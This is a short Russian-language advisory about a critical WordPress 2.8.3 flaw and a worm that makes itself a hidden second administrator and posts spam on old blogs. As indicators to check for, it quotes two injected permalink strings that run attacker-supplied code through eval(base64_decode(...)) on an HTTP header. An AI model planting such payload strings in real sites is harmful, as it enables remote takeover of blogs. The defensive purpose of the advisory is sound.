10 августа стало известно о критической уязвимости в WordPressверсии 2.8.3, которая с легкостью позволяла изменить пароль учетной записи администратора в удалённом режиме. В этот же день вышел релиз WordPress 2.8.4, устраняющий эту уязвимость. Но как оказалось, далеко не все «держатели» блогов следят за апдейтами.

Более того – в эти выходные разразилась эпидемия небывалых размеров нового вируса, поражающего блоги на движке старых версий. Червь регистрируется в блоге как пользователь и далее запускает вредоносный код, используя структуру permalink, в результате чего делает себя вторым администратором. Далее запускается скрипт для стирания данных о черве со страницы пользователей, а после с этой учетной записи начинается добавление спама и ссылок на вредоносный контент в архивные топики.

Как избежать взлома вашего блога WordPress?

• Проверьте фид permalinks/rss на присутствие нижеследующего кода:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

• Прочитайте руководство кодекса по данному вопросу.
• Ознакомьтесь со статьей Мэтта по поводу проблему.
• Попробуйте найти скрытую запись второго администратора.